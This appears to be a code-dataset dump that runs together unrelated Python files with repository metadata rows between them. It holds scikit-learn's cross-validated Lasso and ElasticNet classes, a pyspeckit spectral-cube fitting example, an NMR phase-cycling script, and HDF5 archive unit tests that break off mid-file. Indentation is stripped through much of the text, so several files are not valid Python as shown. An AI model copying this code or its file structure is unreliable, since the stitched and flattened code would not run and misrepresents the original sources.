# We do a double for loop folded in one, in order to be able to
# iterate in parallel on l1_ratio and folds
for l1_ratio, mse_alphas in itertools.groupby(
Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_path_residuals)(
X, y, train, test, self.path, path_params,
l1_ratio=l1_ratio)
for l1_ratio in l1_ratios for train, test in folds
), operator.itemgetter(1)):
mse_alphas = [m[0] for m in mse_alphas]
mse_alphas = np.array(mse_alphas)
mse = np.mean(mse_alphas, axis=0)
i_best_alpha = np.argmin(mse)
this_best_mse = mse[i_best_alpha]
all_mse_paths.append(mse_alphas.T)
if this_best_mse < best_mse:
model = models[i_best_alpha]
best_l1_ratio = l1_ratio
if hasattr(model, 'l1_ratio'):
if model.l1_ratio != best_l1_ratio:
# Need to refit the model
model.l1_ratio = best_l1_ratio
model.fit(X, y)
self.l1_ratio_ = model.l1_ratio
self.coef_ = model.coef_
self.intercept_ = model.intercept_
self.alpha_ = model.alpha
self.alphas_ = np.asarray(alphas)
self.coef_path_ = np.asarray([model.coef_ for model in models])
self.mse_path_ = np.squeeze(all_mse_paths)
return self
@property
def rho_(self):
warnings.warn("rho was renamed to ``l1_ratio_`` and will be removed "
"in 0.15", DeprecationWarning)
return self.l1_ratio_
class LassoCV(LinearModelCV, RegressorMixin):
"""Lasso linear model with iterative fitting along a regularization path
The best model is selected by cross-validation.
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Parameters
----------
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
n_alphas : int, optional
Number of alphas along the regularization path
alphas : numpy array, optional
List of alphas where to compute the models.
If ``None`` alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
max_iter: int, optional
The maximum number of iterations
tol: float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or crossvalidation generator, optional
        If an integer is passed, it is the number of folds (default 3).
Specific crossvalidation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible objects.
verbose : bool or integer
amount of verbosity
Attributes
----------
``alpha_`` : float
        The amount of penalization chosen by cross validation
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
``intercept_`` : float | array, shape = (n_targets,)
independent term in decision function.
``mse_path_`` : array, shape = (n_alphas, n_folds)
mean square error for the test set on each fold, varying alpha
``alphas_`` : numpy array
The grid of alphas used for fitting
Notes
-----
See examples/linear_model/lasso_path_with_crossvalidation.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
See also
--------
lars_path
lasso_path
LassoLars
Lasso
LassoLarsCV
"""
path = staticmethod(lasso_path)
n_jobs = 1
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
copy_X=True, cv=None, verbose=False):
super(LassoCV, self).__init__(
eps=eps, n_alphas=n_alphas, alphas=alphas,
fit_intercept=fit_intercept, normalize=normalize,
precompute=precompute, max_iter=max_iter, tol=tol, copy_X=copy_X,
cv=cv, verbose=verbose)
class ElasticNetCV(LinearModelCV, RegressorMixin):
"""Elastic Net model with iterative fitting along a regularization path
The best model is selected by cross-validation.
Parameters
----------
l1_ratio : float, optional
float between 0 and 1 passed to ElasticNet (scaling between
l1 and l2 penalties). For ``l1_ratio = 0``
the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2
This parameter can be a list, in which case the different
values are tested by cross-validation and the one giving the best
prediction score is used. Note that a good choice of list of
values for l1_ratio is often to put more values close to 1
(i.e. Lasso) and less close to 0 (i.e. Ridge), as in ``[.1, .5, .7,
.9, .95, .99, 1]``
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
n_alphas : int, optional
Number of alphas along the regularization path
alphas : numpy array, optional
List of alphas where to compute the models.
If None alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or crossvalidation generator, optional
        If an integer is passed, it is the number of folds (default 3).
Specific crossvalidation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible objects.
verbose : bool or integer
amount of verbosity
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs. Note that this is used only if multiple values for
l1_ratio are given.
Attributes
----------
``alpha_`` : float
        The amount of penalization chosen by cross validation
``l1_ratio_`` : float
        The compromise between l1 and l2 penalization chosen by
cross validation
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
Parameter vector (w in the cost function formula),
``intercept_`` : float | array, shape = (n_targets, n_features)
Independent term in the decision function.
``mse_path_`` : array, shape = (n_l1_ratio, n_alpha, n_folds)
Mean square error for the test set on each fold, varying l1_ratio and
alpha.
Notes
-----
See examples/linear_model/lasso_path_with_crossvalidation.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
The parameter l1_ratio corresponds to alpha in the glmnet R package
while alpha corresponds to the lambda parameter in glmnet.
More specifically, the optimization objective is::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
If you are interested in controlling the L1 and L2 penalty
separately, keep in mind that this is equivalent to::
a * L1 + b * L2
for::
alpha = a + b and l1_ratio = a / (a + b).
See also
--------
enet_path
ElasticNet
"""
path = staticmethod(enet_path)
def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
fit_intercept=True, normalize=False, precompute='auto',
max_iter=1000, tol=1e-4, cv=None, copy_X=True,
verbose=0, n_jobs=1, rho=None):
self.l1_ratio = l1_ratio
if rho is not None:
self.l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.tol = tol
self.cv = cv
self.copy_X = copy_X
self.verbose = verbose
self.n_jobs = n_jobs
@property
@deprecated("rho was renamed to ``l1_ratio_`` and will be removed "
"in 0.15")
def rho(self):
return self.l1_ratio_
###############################################################################
# Multi Task ElasticNet and Lasso models (with joint feature selection)
class MultiTaskElasticNet(Lasso):
"""Multi-task ElasticNet model trained with L1/L2 mixed-norm as regularizer
    The optimization objective for MultiTaskElasticNet is::
(1 / (2 * n_samples)) * ||Y - XW||^Fro_2
+ alpha * l1_ratio * ||W||_21
+ 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norms of each row.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1/L2 term. Defaults to 1.0
l1_ratio : float
The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
``intercept_`` : array, shape = (n_tasks,)
Independent term in decision function.
``coef_`` : array, shape = (n_tasks, n_features)
Parameter vector (W in the cost function formula). If a 1D y is \
passed in at fit (non multi-task usage), ``coef_`` is then a 1D array
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskElasticNet(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
... #doctest: +NORMALIZE_WHITESPACE
MultiTaskElasticNet(alpha=0.1, copy_X=True, fit_intercept=True,
l1_ratio=0.5, max_iter=1000, normalize=False, rho=None, tol=0.0001,
warm_start=False)
>>> print(clf.coef_)
[[ 0.45663524 0.45612256]
[ 0.45663524 0.45612256]]
>>> print(clf.intercept_)
[ 0.0872422 0.0872422]
See also
--------
ElasticNet, MultiTaskLasso
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
normalize=False, copy_X=True, max_iter=1000, tol=1e-4,
warm_start=False, rho=None):
self.l1_ratio = l1_ratio
if rho is not None:
self.l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
self.alpha = alpha
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
def fit(self, X, y, Xy=None, coef_init=None):
"""Fit MultiTaskLasso model with coordinate descent
Parameters
-----------
X: ndarray, shape = (n_samples, n_features)
Data
y: ndarray, shape = (n_samples, n_tasks)
Target
coef_init: ndarray of shape n_features
            The initial coefficients to warm-start the optimization
Notes
-----
Coordinate descent is an algorithm that considers each column of
data at a time hence it will automatically convert the X input
as a Fortran-contiguous numpy array if necessary.
To avoid memory re-allocation it is advised to allocate the
initial data in memory directly using that format.
"""
# X and y must be of type float64
X = array2d(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
y = np.asarray(y, dtype=np.float64)
squeeze_me = False
if y.ndim == 1:
squeeze_me = True
y = y[:, np.newaxis]
n_samples, n_features = X.shape
_, n_tasks = y.shape
X, y, X_mean, y_mean, X_std = center_data(
X, y, self.fit_intercept, self.normalize, copy=False)
if coef_init is None:
if not self.warm_start or self.coef_ is None:
self.coef_ = np.zeros((n_tasks, n_features), dtype=np.float64,
order='F')
else:
self.coef_ = coef_init
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
self.coef_ = np.asfortranarray(self.coef_) # coef contiguous in memory
self.coef_, self.dual_gap_, self.eps_ = \
cd_fast.enet_coordinate_descent_multi_task(
self.coef_, l1_reg, l2_reg, X, y, self.max_iter, self.tol)
self._set_intercept(X_mean, y_mean, X_std)
# Make sure that the coef_ have the same shape as the given 'y',
# to predict with the same shape
if squeeze_me:
self.coef_ = self.coef_.squeeze()
if self.dual_gap_ > self.eps_:
warnings.warn('Objective did not converge, you might want'
' to increase the number of iterations')
# return self for chaining fit and predict calls
return self
class MultiTaskLasso(MultiTaskElasticNet):
"""Multi-task Lasso model trained with L1/L2 mixed-norm as regularizer
    The optimization objective for MultiTaskLasso is::
(1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norms of each row.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1/L2 term. Defaults to 1.0
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
``coef_`` : array, shape = (n_tasks, n_features)
parameter vector (W in the cost function formula)
``intercept_`` : array, shape = (n_tasks,)
independent term in decision function.
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskLasso(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
MultiTaskLasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
normalize=False, tol=0.0001, warm_start=False)
>>> print(clf.coef_)
[[ 0.89393398 0. ]
[ 0.89393398 0. ]]
>>> print(clf.intercept_)
[ 0.10606602 0.10606602]
See also
--------
Lasso, MultiTaskElasticNet
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=1000, tol=1e-4, warm_start=False):
self.alpha = alpha
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.l1_ratio = 1.0
| bsd-3-clause | 7,439,259,739,322,190,000 | 34.515472 | 97 | 0.585596 | false |
keflavich/pyspeckit-obsolete | examples/n2hp_cube_example.py | 1 | 2271 | import pyspeckit
import os
if not os.path.exists('n2hp_cube.fit'):
import astropy.utils.data as aud
from astropy.io import fits
f = aud.download_file('ftp://cdsarc.u-strasbg.fr/pub/cats/J/A%2BA/472/519/fits/opha_n2h.fit')
with fits.open(f) as ff:
ff[0].header['CUNIT3'] = 'm/s'
for kw in ['CTYPE4','CRVAL4','CDELT4','CRPIX4']:
del ff[0].header[kw]
ff.writeto('n2hp_cube.fit')
# Load the spectral cube
spc = pyspeckit.Cube('n2hp_cube.fit')
# Register the fitter
# The N2H+ fitter is 'built-in' but is not registered by default; this example
# shows how to register a fitting procedure
# 'multi' indicates that it is possible to fit multiple components and that a
# background will not automatically be fit. 4 is the number of parameters in
# the model (excitation temperature, optical depth, line center, and line width)
spc.Registry.add_fitter('n2hp_vtau',pyspeckit.models.n2hp.n2hp_vtau_fitter,4,multisingle='multi')
# Run the fitter
spc.fiteach(fittype='n2hp_vtau', multifit=True,
            guesses=[5,0.5,3,1], # Tex=5K, tau=0.5, v_center=3 km/s, width=1 km/s
signal_cut=6, # minimize the # of pixels fit for the example
)
# There are a huge number of parameters for the fiteach procedure. See:
# http://pyspeckit.readthedocs.org/en/latest/example_nh3_cube.html
# http://pyspeckit.readthedocs.org/en/latest/cubes.html?highlight=fiteach#pyspeckit.cubes.SpectralCube.Cube.fiteach
#
# Unfortunately, a complete tutorial on this stuff is on the to-do list;
# right now the use of many of these parameters is at a research level.
# However, [email protected] will support them! They are being used
# in current and pending publications
# Save the fitted parameters to a FITS file, and overwrite one if one exists
spc.write_fit('n2hp_fitted_parameters.fits', clobber=True)
# Show an integrated image
spc.mapplot()
# This particular cube is a 2x2 image; you can click on any pixel to see its
# spectrum & fit
# plot one of the fitted spectra
spc.plot_spectrum(14,27,plot_fit=True)
# Show an image of the best-fit velocity
spc.mapplot.plane = spc.parcube[2,:,:]
spc.mapplot(estimator=None)
# running in script mode, the figures won't show by default on some systems
import pylab as pl
pl.show()
| mit | -5,961,305,820,016,318,000 | 39.553571 | 115 | 0.722589 | false |
mrosenstihl/PulsePrograms | LED/LED_res.py | 1 | 1841 | class ParameterSet:
"""
From
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52308
Alex Martelli
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
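# Usage sketch (illustrative values): ParameterSet(tmix=1e-3, run='0') simply
# exposes the keyword arguments as attributes (desc.tmix, desc.run), which is
# how the description dictionaries are read in result() below.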
def cyclops(timesignal, r_phase, accumulation_object):
"""
This is CYCLOPS phase cycling.
    The receiver phase must advance by 90 degrees with each step.
    Depending on the phase step, the real and imaginary channels are added to
    or subtracted from the real/imaginary channels of the current accumulation.
"""
if r_phase%4 == 0:# in [0,4,8,12]
ts = timesignal+0
ts.y[0] = timesignal.y[0]
ts.y[1] = timesignal.y[1]
accumulation_object += ts
if (r_phase-1)%4 == 0:#[1,5,9,13]:
ts = timesignal+0
ts.y[0] = -1*timesignal.y[1]
ts.y[1] = timesignal.y[0]
accumulation_object += ts
if (r_phase-2)%4 == 0:#[2,6,10,14]
ts = timesignal+0
ts.y[0] = -1*timesignal.y[0]
ts.y[1] = -1*timesignal.y[1]
accumulation_object += ts
if (r_phase-3)%4 == 0: #in [3,7,11,15]:
ts = timesignal+0
ts.y[0] = timesignal.y[1]
ts.y[1] = -1*timesignal.y[0]
accumulation_object += ts
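# Minimal usage sketch (hypothetical names): accumulating four consecutive
# scans whose receiver phase advances by 90 degrees per step cancels DC
# offsets and quadrature imbalance over the full cycle:
#
#     accu = Accumulation()
#     for step, ts in enumerate(four_scans): # four ADC_Result objects
#         cyclops(ts, step, accu)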
def result():
for res in results:
if not isinstance(res, ADC_Result):
print "ERROR: ", res
continue
descriptions = res.get_description_dictionary()
# rebuild the dictionary because __init__ can't take unicode keys
temp_description={}
for key in descriptions:
temp_description[str(key)] = descriptions[key]
descriptions=temp_description
desc = ParameterSet(**descriptions)
data["Timesignal"]=res
if int(desc.run)%int(desc.accu_length) == 0:
accu=Accumulation()
cyclops(res,int(desc.cyclops),accu)
data["Accu %.1e"%(float(desc.tmix))]=accu | bsd-2-clause | 3,961,073,646,389,585,000 | 31.315789 | 84 | 0.573601 | false |
enthought/sandia-data-archive | sdafile/tests/test_sda_file.py | 1 | 26970 | import io
import os
import random
import shutil
import unittest
import numpy as np
from numpy.testing import assert_array_equal, assert_equal
from sdafile.exceptions import BadSDAFile
from sdafile.sda_file import SDAFile
from sdafile.testing import (
BAD_ATTRS, GOOD_ATTRS, MockRecordInserter, TEST_NUMERIC, TEST_CHARACTER,
TEST_LOGICAL, TEST_SPARSE, TEST_SPARSE_COMPLEX, TEST_CELL, TEST_STRUCTURE,
TEST_UNSUPPORTED, data_path, temporary_file, temporary_h5file
)
from sdafile.utils import (
get_decoded, get_record_type, set_encoded, write_header,
)
class TestSDAFileInit(unittest.TestCase):
def test_mode_r(self):
self.assertInitNew('r', exc=IOError)
self.assertInitExisting('r', {}, BadSDAFile)
self.assertInitExisting('r', BAD_ATTRS, BadSDAFile)
self.assertInitExisting('r', GOOD_ATTRS)
def test_mode_r_plus(self):
self.assertInitNew('r+', exc=IOError)
self.assertInitExisting('r+', exc=BadSDAFile)
self.assertInitExisting('r+', exc=BadSDAFile)
self.assertInitExisting('r+', BAD_ATTRS, BadSDAFile)
self.assertInitExisting('r+', GOOD_ATTRS)
def test_mode_w(self):
self.assertInitNew('w')
self.assertInitExisting('w')
def test_mode_x(self):
self.assertInitNew('x')
self.assertInitExisting('x', exc=IOError)
def test_mode_w_minus(self):
self.assertInitNew('w-')
self.assertInitExisting('w-', exc=IOError)
def test_mode_a(self):
self.assertInitNew('a')
self.assertInitExisting('a', GOOD_ATTRS)
self.assertInitExisting('a', BAD_ATTRS, BadSDAFile)
self.assertInitExisting('a', {}, BadSDAFile)
def test_mode_default(self):
with temporary_h5file() as h5file:
name = h5file.filename
set_encoded(h5file.attrs, **GOOD_ATTRS)
h5file.close()
sda_file = SDAFile(name)
self.assertEqual(sda_file.mode, 'a')
def test_pass_kw(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w', driver='core')
with sda_file._h5file('r') as h5file:
self.assertEqual(h5file.driver, 'core')
def assertAttrs(self, sda_file, attrs={}):
""" Assert sda_file attributes are equal to passed values.
        If ``attrs`` is empty, check that the attributes take on the default values.
"""
if attrs == {}: # treat as if new
self.assertEqual(sda_file.Created, sda_file.Updated)
attrs = {}
write_header(attrs)
del attrs['Created']
del attrs['Updated']
attrs = get_decoded(attrs)
for attr, expected in attrs.items():
actual = getattr(sda_file, attr)
self.assertEqual(actual, expected)
def assertInitExisting(self, mode, attrs={}, exc=None):
""" Assert attributes or error when init with existing file.
Passed ``attrs`` are used when creating the existing file. When ``exc``
is None, this also tests that the ``attrs`` are preserved.
"""
with temporary_h5file() as h5file:
name = h5file.filename
if attrs is not None and len(attrs) > 0:
set_encoded(h5file.attrs, **attrs)
h5file.close()
if exc is not None:
with self.assertRaises(exc):
SDAFile(name, mode)
else:
sda_file = SDAFile(name, mode)
self.assertAttrs(sda_file, attrs)
def assertInitNew(self, mode, attrs={}, exc=None):
""" Assert attributes or error when init with non-existing file. """
with temporary_file() as file_path:
os.remove(file_path)
if exc is not None:
with self.assertRaises(exc):
SDAFile(file_path, mode)
else:
sda_file = SDAFile(file_path, mode)
self.assertAttrs(sda_file)
class TestSDAFileProperties(unittest.TestCase):
def test_file_properties(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
self.assertEqual(sda_file.mode, 'w')
self.assertEqual(sda_file.name, file_path)
def test_set_writable(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
self.assertEqual(sda_file.Writable, 'yes')
sda_file.Writable = 'no'
self.assertEqual(sda_file.Writable, 'no')
with self.assertRaises(ValueError):
sda_file.Writable = True
with self.assertRaises(ValueError):
sda_file.Writable = False
sda_file = SDAFile(file_path, 'r')
with self.assertRaises(ValueError):
sda_file.Writable = 'yes'
class TestSDAFileInsert(unittest.TestCase):
def test_read_only(self):
with temporary_h5file() as h5file:
name = h5file.filename
set_encoded(h5file.attrs, **GOOD_ATTRS)
h5file.close()
sda_file = SDAFile(name, 'r')
with self.assertRaises(IOError):
sda_file.insert('test', [1, 2, 3])
def test_no_write(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.Writable = 'no'
with self.assertRaises(IOError):
sda_file.insert('test', [1, 2, 3])
def test_invalid_deflate(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3], deflate=-1)
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3], deflate=10)
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3], deflate=None)
def test_invalid_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.insert('test/', [1, 2, 3])
with self.assertRaises(ValueError):
sda_file.insert('test\\', [1, 2, 3])
def test_label_exists(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', [1, 2, 3])
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3])
def test_timestamp_update(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.insert('test', [0, 1, 2])
self.assertNotEqual(sda_file.Updated, 'Unmodified')
def test_invalid_structure_key(self):
record = [0, 1, 2, {' bad': np.arange(4)}]
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.insert('something_bad', record)
self.assertEqual(sda_file.labels(), [])
def test_insert_called(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
called = []
sda_file._registry._inserters = [MockRecordInserter(called)]
sda_file.insert('foo', True, 'insert_called', 0)
self.assertEqual(called, ['insert_called'])
def test_structures(self):
structure = {
'foo': 'foo',
'bar': np.arange(4),
'baz': np.array([True, False])
}
failures = (
TEST_NUMERIC + TEST_LOGICAL + TEST_CHARACTER + TEST_STRUCTURE +
TEST_STRUCTURE + TEST_SPARSE + TEST_SPARSE_COMPLEX
)
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
# Store homogeneous structures
label = 'test'
deflate = 0
objs = [structure] * 5
sda_file.insert(label, objs, label, deflate, as_structures=True)
# Check the type
with sda_file._h5file('r') as h5file:
record_type = get_record_type(h5file[label].attrs)
self.assertEqual(record_type, 'structures')
# Other record types should fail
for data in failures:
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
# Inhomogenous records should fail
data = [structure, structure.copy()]
data[0]['baz'] = 10 # change record type
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
del data[0]['baz']
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
# Cell of non-structures should fail
data = [True]
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
def test_from_file(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
contents = b'01'
with temporary_file() as source_file:
with open(source_file, 'wb') as f:
f.write(contents)
label = sda_file.insert_from_file(source_file)
sda_file.describe(label, label)
self.assertTrue(source_file.endswith(label))
def test_from_file_failure(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with temporary_file() as source_file:
pass
# The source file is gone
with self.assertRaises(ValueError):
sda_file.insert_from_file(source_file)
def test_unsupported(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
for i, obj in enumerate(TEST_UNSUPPORTED):
label = 'test' + str(i)
with self.assertRaises(ValueError):
sda_file.insert(label, obj, label, 0)
# Make sure the 'Updated' attr does not change
self.assertEqual(sda_file.Updated, 'Unmodified')
class TestSDAFileExtract(unittest.TestCase):
def test_invalid_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.extract('test/')
with self.assertRaises(ValueError):
sda_file.extract('test\\')
def test_label_not_exists(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.extract('test')
def test_no_timestamp_update(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', [0, 1, 2])
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.extract('test')
self.assertEqual(sda_file.Updated, 'Unmodified')
def test_round_trip(self):
test_set = (
TEST_NUMERIC + TEST_LOGICAL + TEST_CHARACTER + TEST_STRUCTURE
)
def assert_nested_equal(a, b):
# Unravel lists and tuples
if isinstance(a, (list, tuple)) or isinstance(b, (list, tuple)):
assert_equal(len(a), len(b))
for item_a, item_b in zip(a, b):
assert_nested_equal(item_a, item_b)
else:
return assert_equal(a, b)
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
for i, data in enumerate(test_set):
label = "test" + str(i)
sda_file.insert(label, data, '', i % 10)
extracted = sda_file.extract(label)
assert_equal(extracted, data)
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
for i, data in enumerate(TEST_CELL):
label = "test" + str(i)
sda_file.insert(label, data, '', i % 10)
extracted = sda_file.extract(label)
assert_nested_equal(extracted, data)
test_set = TEST_SPARSE + TEST_SPARSE_COMPLEX
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
for i, data in enumerate(test_set):
label = "test" + str(i)
sda_file.insert(label, data, '', i % 10)
extracted = sda_file.extract(label)
expected = data.tocoo()
self.assertEqual(extracted.dtype, expected.dtype)
assert_equal(extracted.row, expected.row)
assert_equal(extracted.col, expected.col)
assert_equal(extracted.data, expected.data)
def test_to_file(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
contents = b'Hello world'
sda_file.insert('test', io.BytesIO(contents))
with temporary_file() as destination_path:
with self.assertRaises(IOError):
sda_file.extract_to_file('test', destination_path)
sda_file.extract_to_file('test', destination_path, True)
with open(destination_path, 'rb') as f:
extracted = f.read()
self.assertEqual(extracted, contents)
# The file is closed and gone, try again
sda_file.extract_to_file('test', destination_path, True)
with open(destination_path, 'rb') as f:
extracted = f.read()
self.assertEqual(extracted, contents)
def test_to_file_non_file(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', 'not a file record')
with temporary_file() as destination_path:
with self.assertRaises(ValueError):
sda_file.extract_to_file('test', destination_path, True)
class TestSDAFileDescribe(unittest.TestCase):
def test_read_only(self):
with temporary_h5file() as h5file:
name = h5file.filename
set_encoded(h5file.attrs, **GOOD_ATTRS)
h5file.close()
sda_file = SDAFile(name, 'r')
with self.assertRaises(IOError):
sda_file.describe('test', 'a test')
def test_no_write(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.Writable = 'no'
with self.assertRaises(IOError):
sda_file.describe('test', 'a test')
def test_invalid_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.describe('test/', 'a test')
with self.assertRaises(ValueError):
sda_file.describe('test\\', 'a test')
def test_missing_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.describe('test', 'a test')
def test_happy_path(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.insert('test', [1, 2, 3])
sda_file.describe('test', 'second')
with sda_file._h5file('r') as h5file:
attrs = get_decoded(h5file['test'].attrs, 'Description')
self.assertEqual(attrs['Description'], 'second')
# Make sure the 'Updated' attr gets updated
self.assertNotEqual(sda_file.Updated, 'Unmodified')
class TestSDAFileMisc(unittest.TestCase):
def test_labels(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('l0', [0])
sda_file.insert('l1', [1])
self.assertEqual(sorted(sda_file.labels()), ['l0', 'l1'])
def test_remove(self):
